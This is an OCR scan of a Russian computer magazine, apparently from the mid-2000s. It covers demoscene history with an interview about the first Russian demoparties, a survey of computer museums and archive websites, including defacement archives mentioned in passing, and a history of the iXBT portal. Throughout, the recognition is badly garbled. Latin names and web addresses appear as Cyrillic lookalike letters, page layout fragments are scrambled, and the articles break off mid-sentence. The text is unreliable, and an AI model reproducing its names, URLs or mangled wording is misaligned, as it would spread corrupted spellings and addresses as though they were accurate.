из Махачкалы. Твой суперэффект — полный шит и мастдай, а сам 
ты нубище полное! Всем пока! ВуеВуе!». Такая переписка в интрах 
была важной частью субкультуры тех лет. Сейчас как-то не укла- 
дывается в голове, что можно 20 минут читать бегущую строчку, 
пусть даже оформленную красивым переливающимся шрифтом. 
Особенно интересно было, сидя в школьном ВЦ, читать, как чело- 
век из далекой Америки, Г ермании или Польши пишет что-то вро- 
де: «Сейчас 3 ночи. Я доделываю свою музыку, а товарищ рядом 
дорисовывает лого. Передаю ему слово. Ні, это ...». Очень живо 
представлялось, как за тысячи километров кто-то что-то тебе пи- 
шет, будто это происходило именно в момент прочтения. Сетей 
ведь тогда почти не было, а те, которые были, работали только с 
машинами под ЕІпіх’ом или на рабочих станциях. Там, кстати, были 
тоже свои традиции, хотя Сценой это не называлось. Техіопіу тобе 
накладывал отпечаток. 



Демопати была одной из точек соприкосновения разных сцен. 
Их посещали как«хакеры», так и азсіі-художники, демомейкеры 
и музыканты. Первой из проходивших в России пати стал Епіідбі, 
стартовавший в 1 995-м году. Чтобы узнать, как все начиналось, я 
побеседовал с человеком, которого считают «отцом всех русских 
демопати». Зовут его Петр Соболев, в сценерских кругах более 
известен как Ргод и СосІеРіррег. Интерьвю с ним читай на врезке. 
«Демопати реально собирали всех под одну крышу. Ребята мог- 
ли по году ругаться и общаться со своим закрытым сообществом 
аски-художников в фидошной эхе ги.рісіигез.рзеѵсіо.дгаі, не при- 
нимать никакого участия в делах демосцены, но, тем не менее, к 
демопати готовились, присылали работы для азсіі-сотро и, если 
могли, приезжали». 

Пример из обычной сценовой жизни. 2000-й год. В Москве тог- 
да должен был вот-вот состояться Міпсігезоигсе, и свою работу я 
рисовал буквально в ночь перед событием, уверенный, что ради 
меня сделают исключение и примут. А для большей уверенности 
переслал ее не напрямую, в оргкомитет пати, асвоему согруппни- 
ку, москвичу Е-Бех’у, который с утреца, за пару часов до компо, 
скопировав мою аскишку на дискету, прямо вручил ее упирав- 
шимся организаторам. Сначала Лекса не пускали, но, заявив что- 
то в духе: «Я — элита, и тараканы мне не указ» , он прорвался через 
ограждения, секьюрити и передал диск нужным людям. В итоге 
эта работа взяла первое место. Каково же было мое удивление, 
когда выяснилось, что Леке отдал совсем не ту работу, которую 
я приготовил. Зная вкусы посетителей демопати, я нарисовал из 
ансишных кубиков обнаженную женскую грудь, а Леке выставил 
трехмерную буковку «Т», в типичном для стрит-арта написании, 
которую я нарисовал много раньше. Или вспомнить первый СІтаоз 
Сопзігисііопз в 99-м году. Это сейчас СС проходит в чистеньком, 
цивильном ЛДМе, а тогда — в какой-то школе на окраине города, 
куда съезжались люди из разных городов. Казалось, что все зна- 
ют друг друга, что ты попал в какое-то«тайное общество». То де- 
мопати никак нельзя было назвать фестивалем — скорее это был 
слет для непосвященных, имеющий какой-то ритуальный смысл. 
Продолжение следует... дс 



«Носители демосцены» — старенькие 
диски с европейским варезом 



СЦЕНА 
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Интервью с СосІеКіррег’ом 



СгазИег: Я, наверное, не ошибусь, если скажу, что ЕпІідИІ 95 стал 
поворотным событием на демосцене, ведь ему удалось собрать 
людей из разных уголков стран СНГ, заявить о существовании 
сценовой субкультуры на более высоком уровне. 

Ргод: Возможно, но я бы не взялся это утверждать. Дело в том, что 
связующим звеном для людей, неравнодушных ко всяким специ- 
фическим компьютерным вещам, у нас выступал (и по-прежнему 
выступает) РібоЫеГ Уже тогда проводились сисопки, просто они 
были менее организованны, масштаб был поменьше. Первые 
два ЕпІідбГа многие восприняли именно как сисопку, поскольку 
большинство сценеров были фидошниками и знали друг друга. 
СгазИег: Как пришла идея организовать глобальный слет сценеров? 
Ргод: Еще когда я сидел на Соттобоге 64 и читал всякие 
бізктад’и, там рассказывалось о зарубежных демопати. Мы зна- 
ли про финскую АззетЫу, которая проводилась с 1 992-го года, 
видели своими глазами ІІпгеаІ, Зесопб Реаіііу, Рапіс, имели пред- 
ставление о легендарной группе Риіиге Сгеѵѵ. Известный ныне 
АЬузз — главный организатор АззетЫу — был тогда сисопом 
ЗіагРогі ВВЗ. Это была официальная борда РиШге Сгеѵѵ. Мы туда 
звонили, что-то качали. Потом я переписывался с (Зоге (в то время 
— главный организатор и идейный вдохновитель Ришге Сгеѵѵ). 

В 1995-м году уже настало время РС, появились сети, в России 
народ принялся активно писать интры и демы. Было понятно, что 
если мы организуем пати, люди выставят свои работы, приедут. 
Таки оказалось. 

СгазИег: После инлайта в разных уголках России появились 
другие демопати: Міпбгезоисе, МіІІепіит, Рагабох, ВуІеТаІІ, ЭіРІаІІ, 
Саіе. Но именно питерские оказались самыми популярными и 
«живучими». Почему? 

Ргод: Большинство демопати, проходящих за пределами Москвы 
и Питера, при всем старании организаторов, не могли собрать 
большое количество сценеров. Одно дело приехать в Питер, 
другое — в Казань. К примеру, если на Е’97 было порядка 1 200 
человек, то на упомянутых тобой — максимум 1 50-200. Правда, 
московкие тусы тоже не пользовались большой популярностью, 
и я до сих пор не понимаю, почему в Москве нет масштабной ... да 
что масштабной, хотя бы регулярно проводимой демопати. Каза- 
лось бы, все условия есть: деньги через город текут рекой, есть 
коммуникации, много людей. Но чего-то не хватает. Целых два 
года нам понадобилось, чтобы мы расстались с иллюзиями о том, 
что сценеры сами могут поддерживать порядок в своих рядах, что 
будут себя прилично вести. Увы, это не сработало. ЕЫиОНТ’97 
стал для организаторов холодным душем: сотни человек, кото- 
рые, если брать по отдельности, хорошие и интересные люди, 
собравшись вместе, вели себя так, что праздник закончился 
отменой второго дня и милицией. На 1 200 посетителей у нас было 
около 5-ти человек, которые обеспечивали безопасность, причем 
добровольцев, а не профессионалов. Понятно, что хоть они и 
старались навести порядок, но мало что могли сделать. Народ с 
легкостью проносил в зал спиртное, и через некоторое время си- 
туация стала неуправляемой. Сейчас вспоминается один сценер, 
бегающий по рагіу ріасе в пневматической винтовкой. В общем, 
после ЕІ\ІІ_і(ЗНТ’97 мы сделали для себя серьезные выводы, и оче- 
редной слет, теперь уже названный СИаоз Сопзігисііопз, прошел 
только через 7 лет, в 2004-м году. 

СгазИег: В чем же заключается Іип-посещения и участия в демопати? 
Ргод: Это трудно описать словами. Весь кайф состоит из 
отдельных моментов, причем у каждого они свои. Например, 
просмотр очевидных фаворитов конкурсов бегло или іпіго. Когда 
ты смотришь на большом экране работу, которую ранее нигде 
не показывали, рядом с тобой на экран смотрят люди, которым 
интересно то же, что и тебе, реагируют на те же моменты, что и 
ты. Разговоры в фойе с людьми из других городов, а то и стран, 
которых не видел несколько лет или с которыми впервые позна- 
комился в реале. Томительное ожидание результатов. . . Помню, 
на ЕШОНТ’96 наш человек со списками результатов еле смог 
вырваться из толпы, рванувшей посмотреть, кто же победил :). 
Такое вот единение 

.СгазИепТы был на Сцене у самых ее истоков. Расскажи, как 
зарождалась Сцена в России? 

Ргод: Я застал еще полное отсутствие у нас всякой сцены. Атіда 
тогда только-только стала появляться — у нас ее счастливыми 




владельцами были только серьезные студии телевидения. У 
обычных людей были лишь Соттобоге 64, Аіагі ХЕ/ХІ_. На Коммо- 
доре имелось некое подобие Сцены — думаю, на весь Союз чело- 
век 1 5 — 20 максимум. Переписывались с зарубежными группами 
обычно по почте. (ЗЬозіВібег, ныне отошедший отдел, получал 
5” диски, расписанные фломастером: ІКАРІ ТАБЕКІТ, РАІРЫСНТ, 
ТВІАЭ, потом рассылал все это тем самым 15-ти знакомым. В на- 
чале между сценерами не было никакой разницы. Конечно, кто-то 
занимался больше варезом, кто-то больше кодил, но в целом 
крутились в «одном соку», и все были «свои люди». 

СгазИег: Ты видел весь процесс развития, какие вещи были 
характерны для ранней Сцены и утеряны сейчас? 

Ргод: Одной из характерных вещей того времени были так 
называемые поіегз. Скажем, группа зарелизиладему или диск 
с варезом. Запускается программа-нотер, и в ней пишется 
какой-нибудь приветственный текст тем , кто этот диск полу- 
чит. Программы эти были разные, но суть была в том, что текст 
можно набивать красивым шрифтом, с имитацией перемещения 
курсора — как на печатной машинке. Можно делать летающие 
логотипы, вставлять музыку — все это либо рисовали сами, 
либо выдергивали из игрушек и линковали к программе. После 
нажатия «Заѵе» генерировалась программа, вмещающая все это 
в одном запускаемом файле. Человек получал диск, читал текст 
и мог написать ответ в этой же самой программе. Своего рода 
электронное письмо, но куда более близкое к настоящему письму 
— в нем чувствуется писавший его человек. Вот такая вот утра- 
ченная традиция! Другой интересной вещью было графическое 
оформления директорий. Это сейчас, когда набираешь «ЭІВ» 
или смотришь в подкаталог, там лежат файлы, отсортированные 
по какому-то признаку. А тогда ничего такого не было. На том же 
С64 ты вставляешь диск, даешь команду «Показать содержимое» 
и получаешь список файлов в определенной последовательнос- 
ти. Народ это быстро просек и рисовал псевдографикой разные 
рамки, картинки. Можно было при выводе директории даже 
очищать экран и менять цвет курсора специальными командами. 
Большую роль играли загрузчики. Дисководы были медленными, 
и, чтобы загрузить игру или программу, необходимо было ждать 
минуты. Поэтому писались загрузчики, которые параллельно с 
загрузкой рисовали картинку, играли музыку (музыка грузилась 
быстро, так как РМ-синтез имеет небольшой размер). Позднее 
появились скоростные загрузчикищисковод перепрограммиро- 
вался, и одна из линий шины (кажется ВЕЗЕТ) использовалась 
как второй бит в последовательном интерфейсе. Дисководы от 
этих скоростных загрузчиков издавали жуткие звуки, головка 
частенько сбивалась, так что его приходилось ремонтировать 
уже физически. 

СгазИег: Скоро пройдет СИаоз Сопзігисііопз 2006. Что нам стоит 
ожидать? 

Ргод: Время проведения — с 26 по 27 августа. Ожидается ряд 
очень серьезных новшеств. Мы попытаемся сделать наш фес- 
тиваль менее формальным, для чего, к примеру, людям со своим 
компьютером будет обеспечен бесплатный вход, стол, розетка, 
Интернет. Все детали можно найти на сайте ИДр://сс6.ога.ги . 
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ИЛЬЯ АЛЕКСАНДРОВ 

/ІІ-ѴА_АІ_@ПАМВІ_ЕП.ПІІ/ 



Компьютерные музеи 
бывшего СССР 

Если ты уже собрался в следующие выход- 
ные посетить экспозицию процессоров 
РОР 70-го года выпуска, то вынужден тебя 
огорчить. Построением компьютерных 
музеев в нашей стране занимаются вяло 
и неохотно. Но парочка интересных мест 
имеется и у нас. 

Например, Московский политехнический 
музей. В основном там представлены вся- 
кие микроскопы, пишущие машинки и «кол- 
лекция стальных пишущих перьев» , но есть 
и более интересные экспонаты, например, 
телефоны начала и середины века — по- 
верь, они разительно отличаются от Нокии, 
которую теперь юзает твоя бабушка. Среди 
выставленных на показ компьютеров не- 
мало настоящих старичков: Радио-РК86, 
БК-0010, Орион-128 и даже чудо вычисли- 
тельной техники «Микроша». Я не застал 
того времени, когда эти машины были на 
пике моды, поэтому ностальгического вос- 
торга они у меня не вызвали. Безусловно, 
лучшее, что есть в «политехе» — это его 
роботы. Коллекция открылась еще в шес- 
тидесятом году — тогда в музее появился 
знаменитый робот-экскурсовод Сепулька. 
Теперь к нему добавились манипуляторы 
с биоэлектрическим управлением, шагаю- 
щие механизмы, экзоскелетон и некоторые 
советские промышленные разработки. Ко- 
нечно, это не японские киборги, но тоже ни- 
чего. Адрес музея: Москва, Новая площадь, 
Д-3/4. 

Увы, навеем широком пространстве Россий- 
ской Федерации ІТ-музеев больше нет. Зато 
есть у наших соседей украинцев. Музей вы- 
соких технологий недавно открыли в Киевс- 
ком цифровом гипермаркете Сііу.сот. На 
стендах музея красуются лампы, с помощью 
которых работали первые ЭВМ, перфориро- 
ванные и магнитные ленты с информацией, 
ноутбуки Арріе семидесятых годов выпуска. 
Присутствует Моіогоіа РІаге — телефон, с 
которого был сделан первый звонок в сети 
ОЗМ Украины. Есть даже настоящий детек- 
тор лжи! Интересным было и само откры- 



Коллекция калькулятор 



тие музея, сделанное в стиле компьютерной 
игры. Прежде чем войти, посетителям пред- 
лагалось выполнить определенные зада- 
ния: прослушать информационный ролик, 
крутившийся в торговых залах, найти сііу- 
девушку и выпытать у нее пароль для входа. 
Сейчас в музее проходит выставка «Вчера, 
сегодня, завтра». Как нетрудно догадать- 
ся, там демонстрируют чудеса прогресса и 
светлое будущее человечества, с биоробо- 
тами и видеофонами. 

Еще один музей я отыскал в Таллине. Он со- 
здан русскимлюбителем компьютеров, у ко- 
торого, похоже, большой опыт использова- 
ния оных. По крайней мере, древних ЭВМ у 
него в коллекции предостаточно: Аіаіг 8800, 
АррІе-1, Соттобоге РЕТ, ранняя модель 
ІВМ РС. Каждый экспонат сопровождается 
информацией, включающей технические 
характеристики. Музей постоянно попол- 
няется новым железом (недавно завезли 
черный «текст-процессор» ОІіѵейі — фе- 
номенальная вещь) и имеет свой филиал 
в Сети: НйрѴ/рНапІот.заппаІа.ги/тизеит . 
На этом, увы, обзор ИТ-музеев в СНГ вы- 
нужден завершить, так как ничего другого 
мне найти не удалось. Надеюсь, в будущем 
эта ситуация изменится. 



Зарубежные выставки 

За бугром, как полагается, ситуация получ- 
ше — разнообразных музеев высоких тех- 
нологий полно. К одному из них приложила 
руку сама МісгозоЙ, основавіі 
ваемый ѴізіФгз сепіег. Там 
ознакомиться с тридцатиле 
компании, посмотреть нали 
с дистрибутивом ѴѴіпбоѵѵз 1 .0, пол 
ся запущенным МЗ-ЭОЗ, увидеть 
фотографии из детства Билли Г ейтса и дру- 
гих важных работников МісгозоЙ. В общем, 
местечко небольшое, но вполне уютное. 
Интересный Музей технологий существует 
в Мюнхене. Он посвящен астрономии и 
освоению космоса: луноходы, 
роботы-конструкто- 
ры, ПО кос- 
мичес- 






Музей компьютерной истории в Хюнфелде 

ких кораблей, представленное на экранах 
мониторов... Можно посмотреть, какое 
оборудование используют в ІЧАЗА и подоб- 
ных центрах. 

Крупная коллекция околокомпьютерного 
антиквариата имеется в Амстердамском 
университете. Здесь представлены экс- 
понаты со времен Второй мировой войны 
до наших дней. Большинство машин нахо- 
дится в рабочем состоянии, так что можно 
прийти и пощупать то, на чем хачил твой 
дед. Отдельная гордость музея — ѴѴіІІет 
Ваф'епз, самый первый голландский ком- 
пьютер. Примечательно, что в музее обе- 
щают бесплатно переписать информацию 
с магнитной ленты на СО. Еще в музее есть 
коллекция работающих компов на реле. 
Агентство национальной безопасности 
США хостит у себя Национальный крип- 
тологический музей. Посвящен он, как не 
трудно догадаться, криптографии и крип- 
тографам. Среди экспонатов музея можно 
обнаружить, например, сконструированные 
специально для Агентства суперкомпью- 
теры Сгау 93-го года сборки — огромные 
зверь-машины, уже тогда имевшие по 32 
гигабайта памяти на борту. Еще один ин- 
тересный «экспонат» — лаборатория, где 
производились чипы для криптокомпью- 
теров. Любители азбуки Морзе и прочие 
шифропанки могут полазить в крупнейшей 
библиотеке, где содержатся тысячи книг 
о криптографии. В музее часто устраива- 
ют конференции. К примеру, тема конфы 
этого года — «Криптография и холодная 



война», хотя, конечно, ничего секретно- 
го там не расскажут. Специалисты могут 
пройтись по компьютерным залам, где 
демонстрируется шифровка-расшиф- 
ровка информации в реальном времени, 
с помощью различных алгоритмов. Музей 
ежегодно посещают 50 000 посетителей, 
а особой популярностью он пользуется у 
студентов-технарей . 

Кремниевая долина — место, которое не- 
возможно себе представить без компью- 
терного музея. Все-таки компьютерная 
Мекка! Главный музей находится в Сан- 
Хосе, в самом сердце долины. Недавно там 
открылся павильон Ѵіеѵѵ Ігот Зрасе (типа 
привычного нам планетария, только тех- 
нологичнее и продвинутее). Внутри мож- 
но увидеть, что происходит с планетой во 
время бурь и ураганов, поглазеть на Землю 
с разных высот. Изображение масштаби- 
руется с помощью спутника, и есть шанс 
даже разглядеть свою дачку в поселке Пуп- 
кино. В музее можно обнаружить конвейер, 
на котором раньше делали микропроцес- 
соры. Интересен экспонат тем, что на нем 
оттачивались микросхемы размером не- 
сколько миллиметров. 

Доступна для посещения генетическая ла- 
боратория. Хочешь узнать, как получаются 
мутанты? Пожалуйста. Отдельного внима- 
ния заслуживает громадный макет плане- 
ты Марс, заключенный в восьмиэтажный 
купол. Были созданы все условия, чтобы в 
куполе поддерживалась реальная темпе- 
ратура. 



В Кремниевой долине есть еще несколько 
музеев — например, Музей компьютерной 
истории, количество экспонатов в котором 
достигает семисот тысяч! Про «умный» дом 
твой любимый журнал уже писал. Так вот, в 
Зііісоп ѴаІІеу отгрохали даже не смартхауз, 
а целый коттедж, по которому ты свободно 
можешь прогуляться и оценить все прелести 
хай-тека. «Умный» дом сам будет открывать 
двери, включать свет, готовить еду, забо- 
титься о безопасности и т.д. 

Есть свой музей и у ІпіеІ. Там тебе покажут 
и первые процессоры компании, и послед-^ 
них многоядерных серверных 
Можно ознакомиться с истори " ^ 
биографией основателей 
лей, атакже посидеть в компьютвртоі 
за машинами, долгое время верой и 
дой служившими правительству. В оі 
стандартный музей серьезной і^іпі 
сделанный скорее для солидності 
Конечно, все это очень интерёі 
вательно, но, согласись, что возмі 
для посещения этих музеев у нас с 
немного. Поэтому я плавно перехожу к о(^ 
зору виртуальных музеев. 
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Сетевые ^сспонаты 

Начну с самого известного и посеща- 
емого — ѵѵѵѵѵу.сотриіег-тизеит.ги . 

Сайт создан Эдуардом Пройдаковым при 
поддержке российского представительства 
МісгозоЙ и журнадаіРС ѴѴеек/ВЕ. Эдуарда, 
который является -владельцем РС, не уст- 
раивало отсутствій книг о компьютерной 
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истории и небольшое количество подоб- 
ных сайтов в Сети, поэтому он решил со- 
здать свой проект, который быстро стал 
популярным. Музей охватывает все ком- 
пьютеры, разработанные и бывшие в упот- 
реблении натерритории СССР. 
Поддержкой сотриіег-тизеит.ги зани- 
маются несколько человек, образующих 
Совет. В него входят главный конструктор 
ЕС ЭВМ Виктор Пржиялковский, бывший 
директор Института электронных управля- 
ющих машин (ИНЭУМ) Евгений Филинов и 
несколько других компьютерщиков. Музей 
этот во многом уникален. Например, нигде 
больше ты не найдешь в качестве экспо- 
натов бортовых компьютеров (БЦВМ) или 
^^у^лодробного «Англо-русского словаря 
^ Р терминов и сокращений по Интернету и 
программированию». На данный момент 
словарь содержит порядка 11 -ти тысяч 
терминов и наверняка пригодится всем 
кодерам и просто юзе- 
рам, прогуливавшим 
в школе английский. 
Интересна «Галерея 
славы», в которой со- 
держатся биографии 
ученых и просто лю- 
дей, внесших весомый 
вклад в развитие ІТ. 
На сайте много позна- 
вательных статей об 
сНовоположниках 
школы русского про- 
граммирования, атак- 
бликована ис- 
тория развития всех 
ОС: от всем извест- 
ных І_іпих и ѴѴіпсІоѵѵз 
до экзотической Іпіегпо и позабытого 
дядюшки ДОСа. Коллекция представ- 
ленных ПК поражает воображение: 
с ЭВМ «Сетунь» и «Днепр» мне 
сталкиваться еще не приходи- 
лось. Имеется и чудо робо- 
тотехники времен СССР 
— марсоход 




« Кентавр». 
Такие, оказывает- 
ся, существуют не толь- 
ко в фантастических фильмах 
Джорджа Лукаса! В разделе «техно- 
логии» можно прочитать про квантовую 
криптографию, РСІ, принципы работы ЭОВ 
ВОРАМ и даже про устройство сети ФИ ДО- 
нет. Там же я наткнулся на игровой раздел. 
Он не очень большой, но там есть несколь- 
ко интересных статей об игровых техноло- 
гиях и истории компьютерных игр. В самом 
деле, где еще прочтешь обзор только что 
вышедшего первого ѴѴагСгаІіа от журнала 
«Компас»? Каждый день музей посещают 
сотни посетителей, он постоянно попол- 
няется новыми статьями и экспонатами, и 
авторы с удовольствием разместят инфу о 
доисторическом железе, возможно, пыля- 
щемся у тебя в шкафу. 

Еще один интересный проект, правда, рас- 
считанный больше неспециалистов — ИДр:// 
егзНоѵ.ііз.пзк.зи/гиззіап . Сайт является ар- 
хивом работ академика Ершова, одного из 
первыхотечественныхпрограммистовипи- 
онераинформационныхтехнологий. После 
смерти академика осталось около пятисот 
канцелярских папок с его трудами, отража- 
ющими развитие информатики в России. 
На сайте содержится подробнейшая био- 
графия Ершова и большая часть его про- 
ектов, например программы, написанные с 
помощью языка Апгол-60. Конечно, все это 
будет понятно далеко не каждому. 

Автором странички ИДр://гк86.сотЛгоІоѵ/ 
саішІЩт является Сергей Фролов, кото- 
рый занимается виртуальным коллекциониро- 
ванием калькуляторов. Его коллекция — самая 
крупная в рунете ( 1 45 экспонатов) . Есть, на- 
пример, механический арифмометр Однер- 
Г иль конца XIX века, все модели культового 
советского калькулятора МК. Каждый экс- 
понат снабжен фотографиями и детальными 
характеристиками. Г осподин Фролов сейчас 
ищет помещение в Питере, так что, возмож- 
но, скоро одним реальным компьютерным 
музеем у нас станет больше. 

На сайте фанатов Арріе «Мой макинтош» 
тоже есть свой музей: ННр://тѵтас.ги/ 
тизеит . 

Похоже, там присутс- 
твуют все мо- 
дели Маков, 
включая при- 
мечательный 




своим диз, Возняк с Джобсом собирали в 
гараже, по другой — в ванной комнате. 
Встретить в Сети сайт, полностью пос- 
вященный одному-единственному ком- 
пьютеру — большая редкость. Тем 
не менее, есть и такие. Например, Нйр: 
/Аі99-4а.пагосІ.ги — музей, посвященный ком- 
пьютеру ТЕХАЗ ІЫЗТРІІМЕКІТЗ (ТІ-9). Техни- 
ческое устройство, история развития, эн- 
циклопедия по использованию компьютера 
плюс фотографии и что-то вроде мемуаров 
пользователя. 

На сайте оШіІ ти находится компьютер- 
ный музей, созданный Денисом Якимовым. 
Здесь также можно найти много интересно- 
го о советских компьютерах. Я, например, с 
удовольствием почитал об ЭВМ, названном 
моим любимым женским именем «Ириша». 
Машина имеетбі 2 Кб ОЗУ и процессор ІпіеІ 
8080. На сайте можно скачать эмуляторы 
древних компов: Вектор-06Ц, Орион-128 и 
другие. Зарубежных компьютеров на сайте 
немного — рассматриваются в основном 
самые популярные персоналки в нашей 
стране: Спектрум, Амига, Соттобоге. Но 
зато дается обширная информация о 2Х, а 
также документации, фотографии, схемы, 
эмуляторы, обзор наших и зарубежных мо- 
делей и т.д. 

Швед Том Карлсон является создате- 
лем одного из старейших сайтов, посвя- 
щенных компьютерной истории: НДр:// 
оЬзоІеІесотриІегтизеит.ога . Не могу ска- 
зать, что меня удивили какие-то его экспо- 
наты — все довольно стандартно, но есть 
очень интересная фишка — ЗЭ-модели 
старых ЭВМ. Можно рассматривать их со 
всех сторон, вертеть, увеличивать и умень- 
шать. Довольно весело. 

МІ8С 

Коллекционеры старого компьютерного 
железа есть и в Живом Журнале — в комь- 
юнити Нагбѵѵаге_тизеит. Его подписчики 
выкладывают фотографии завалявшегося 
у нихжелеза и обсуждают ценный антиква- 
риат. Чуваки раздобыли где-то и древний 
РЭР-1 1 , и видеокарту РТ с 51 2 килобайтами 
видеопамяти, и даже целый рабочий ком- 
пьютер ВоЬоІгоп 1715. Там есть и другие 
интересные экспонаты, так что если тусу- 
ешься в Ы — не поленись зайти. 

Для поклонников ІІпіх я подготовил отде- 
льный подарок — іипіх.кгп.ги/ипіх/ипіх.Ніт ! 
Это самый настоящий никсовый терминал, 
знающий почти все команды, позволяю- 
щий гулять по каталогам и даже создавать 
свои файлы! В общем, если ты фанат сво- 
бодного ПО, но сидишь на работе за вин- 







дой — смело добав- 
ляй сайт в закладки 
браузера. 

Пришло время 
вспомнить о музе- 
ях настоящего хакер- 
ского искусства. Я говорю 
о хранилищах дефейсов, самым 
крупным из которых в рунете является 
сайт ѵоіб.ги . В отделе с забавным названи- 
ем «Трофеи и чучела» можно увидеть гале- 
рею всех известных взломов. Дата, адрес 
сайта, скриншот, автор взлома, какое ПО 
стояло на серваке — здесь ты узнаешь все. 
Сейчас там содержится более 1 1-ти тысяч 
зеркал, и обновляется архив ежедневно. 
Из западных ресурсов лучшим считался 
беіазеб.аіібаз.ога . но теперь он не подает 
признаков жизни. Если ты интересуешься 
дефейсами заморских команд, то поли- 
стай архив ѵѵѵѵѵѵ.заіетобе.ога . который, 
правда, перестал обновляться. На портале 
ѵѵѵѵѵѵ.зтагіііаск.сот содержится всего 57 
зеркал, зато каких! Только самые громкие 
взломы сайта ІЧАЗА, Пентагона и других 
оплотов власти. 

Страничка ѵѵѵѵѵѵ.ЬеІаегз.сот/сотриІегз 
полностью посвящена хакерам. Все книги 
о хакерах, фильмы, нашумевшие статьи и 
даже телерепортажи. 

Наверное, тебе интересно посмотреть 
как выглядели некоторые популярные 
веб-сайты пару лет назад? Мизеипп.ика. 
Ш предоставит тебе эту возможность. Ты- 
увидишь, как с годами менялся дизайн «Ян- 
декса» , « Русского журнала» , ХВТ.ги . ехіег. 
Ш и многих других сайтов. Там, правда, нет 
хакер.ги . но, думаю, впоследствии этот до- 
садный недостаток будет исправлен. 

Что же, наша экскурсия подошла к концу. 
Я постарался рассказать тебе о самых ин- 
тересных технологических музеях, встре- 
чающихся в Сети и реале. Тебе остается 
только пройтись по оставленным ссылкам 
и узнать обо всем самому. Удачного про- 
смотра! со 
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ИЛЬЯ АЛЕКСАНДРОВ 

/ІІ.ѴА_АІ..ЫѴЕ,І01ІЯЫАІ..С0М/ 



р ѵ« 



іф V* Если ты бысі] 
пьютеры, знаешь ] 
твой проц разогнан до 



йь собирать ком- ^ I 
дежду АСР и РСІ-Е, 
комната завалена всевоз 



можными комплектующими, то ты наверняка зна- 
ком с сайтом іхЪг.сот, крупнейшим техническим 
порталом в рунете и центральным местом общения 
всех железячников и просто любителей хай-тека. 






Немного истории 

Домен ѵѵѵѵѵѵ.іхЬГсот был зарегистрирован группой русских про- 
граммистов во главе с Павлом Соколовым в январе 1 997-го года. В 
это время в рунете наблюдалось полное отсутствие компьютерных 
порталов, а те, что имелись, либо ориентировались на програм- 
мное обеспечение, либо их качество не выдерживало никакой 
критики. Павлу же хотелось создать крупный ресурс, наполненный 
объективной и полезной информацией о всем, что происходит в 
мире хай-тека, персональных компьютеров и периферийных ус- 
тройств. Подготовка к запуску сайта длилась почти год, и, нако- 
нец, 1-го октября 1997-го года, он стал доступен для посетителей. 
Рунетчики получили то, чего им так не хватало: объективную ин- 
формацию о новом железе, с тестами и рекомендациями. Вскоре 
заработала новостная лента, ньюсы для которой черпались из гзз- 
лент зарубежных порталов. Завсегдатаи іхЬГсот теперь первыми 
узнавали об ИТ-событиях в мире. Конечно, сайт обзавелся и своим 
форумом, который сразу стал популярным местом общения. Во- 
обще, в это время для серьезных компьютерщиков имелось два 
местаобитания: хакеры зависали вхакзоне, оверклокеры и прочие 
фанаты железа — в конференции ІХВТ. 

Дизайн для сайта разработала студия «РусАрт» — тогда не менее 
авторитетная, чем студия Лебедева. Простая, предельно понятная 
навигация, минимум графики и четкая структуризация контента 
— все это в немалой степени способствовало популярности пор- 
тала. 

Для раскрутки был создан так называемый ІХВТ-клуб, в который 
входили дружественные сайты. Они развивались при содействии 



команды Соколова. Появились первые публикации о портале в пе- 
чатной прессе... В общем, когда раздел «Компьютеры» ВатЫег 
іор 100 возглавил іХВТ.сот, этому никто не удивился. 

Развитие портала 

На достигнутом авторы останавливаться не собирались. К ново- 
стям компьютерной индустрии добавились ньюсленты о новинках 
софта, игр, гаджетов, 0\Ю-рынка и даже МасЫІе пеѵѵз. В общем, 
освещение событий и продуктов Арріе. Конференция, раньшеслу- 
жившая только для обсуждения вопросов вроде «Радеон, мать его, 
глючит», превратилась в виртуальное место встречи сотрудников 
успешных ИТ-компаний и их клиентов, обсуждающих перспективы 
рынка и решения проблем на предприятиях. Хотя обсуждали не 
только компы, но и политику, кино, просто трепались за жизнь. 
Появились ежемесячные «ІТОГИ» — аналитический материал, в 
котором эксперты давали оценку самым важным событиям ком- 
пьютерного мира, пытались проследить тенденции развития ин- 
дустрии и сделать выводы о новых технологиях. Успех «ІТОГОВ» 
способствовал появлению аналогичного проекта — ЗООЛОГИ, с 
той лишь разницей, что ЗОО рассказывали о видеоакселераторах, 
драйверах и игровых трехмерных движках. 

В конце 1999-го года ІХВТ.сот заключил контракт с рекламной 
фирмой «Два солнца», что позволило сделать инвестиции в новые 
проекты и выделить больше времени и средств на развитие сайта. 
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С этого момента ресурс вышел на более ка- 
чественный уровень. Сегодня ІХВТ — серь- 
езная ИТ-компания. 

Со временем проект вышел на отметку 
37000 посетителей ежедневно и стал пос- 
тоянным номинантом в пятерке лучших ком- 
пьютерных сайтов глобального рейтинга 
ѴѴогІб 1000. Чтобы іхЫ.сот мог выдержать 
такую нагрузку, компания закупила серве- 
ры с двухпроцессорными двухъядерными 
ОиаІ-Соге АІѴЮ ОрІегопФ 265. Также для 
дальнейшего развития был увеличен штат 
работников до нескольких десятков чело- 
век. Известность бренда ІХВТ привлекла 
к нему мировых производителей компью- 
терных комплектующих, которые с удо- 



два закрытых раздела: для 
ремонтников и профессионалов 
компьютерного маркетинга. 

Чтобы участвовать в дискуссиях, 
нужно получить одобрение 
модераторов и доказать свою 
причастность к профессии. 

Самые нелепые и смешные посты 
заносятся в «Музей юмора». 
Например, там можно прочитать 
яростный спор двух фанатов: 
винды и линукса, наговоривших 
846 постов. Диалог длился около 
трех месяцев, но в конце каждый 
остался при своем мнении. 



из всех перечисленных. Теоретические 
статьи о перспективах подобных киберх- 
рущевок, о применяемых технологиях, а 
также практические рекомендации по 
превращению твоей берлоги в смарт- 
хаус. 



Новая эра ІХВТ 



В 2002-м году впервые появился печат- 
ный журнал ІХВТ. сот, посвященный, как 
и сайт, компьютерному железу и хай-теку. 
Выходит он по сей день и , по сути , является 
компиляцией самых полезных и интерес- 
ных статей, публиковавшихся на сайте в 




гідНІтагк.огд — англоязычный проект ІХВТ, 
посвященный бенчмаркингу 



вольствием предоставили свои новейшие 
разработки в обмен на профессиональное 
мнение о них на сайте. 

Дочерние проекты 

ІХВТ. сот — это главный портал компа- 
нии, на котором сосредоточены основ- 
ные силы, но он не единственный. Коман- 
да авторов занимается поддержкой еще 
нескольких сайтов. Расскажу вкратце о 
самых интересных из них. 
ѵѵѵѵѵѵ. коток. сот — крупнейшая сетевая 
барахолка, где можно купить или продать 
б/у-шные процессоры, мышки, ноутбуки 
и т.д. Здесь я сумел быстро избавиться 
от старого семнадцатидюймового мони- 
ка, который не удавалось слить даже на 
«молотке». 

сотриіогд.іхЫ.сот — сайт для людей, 
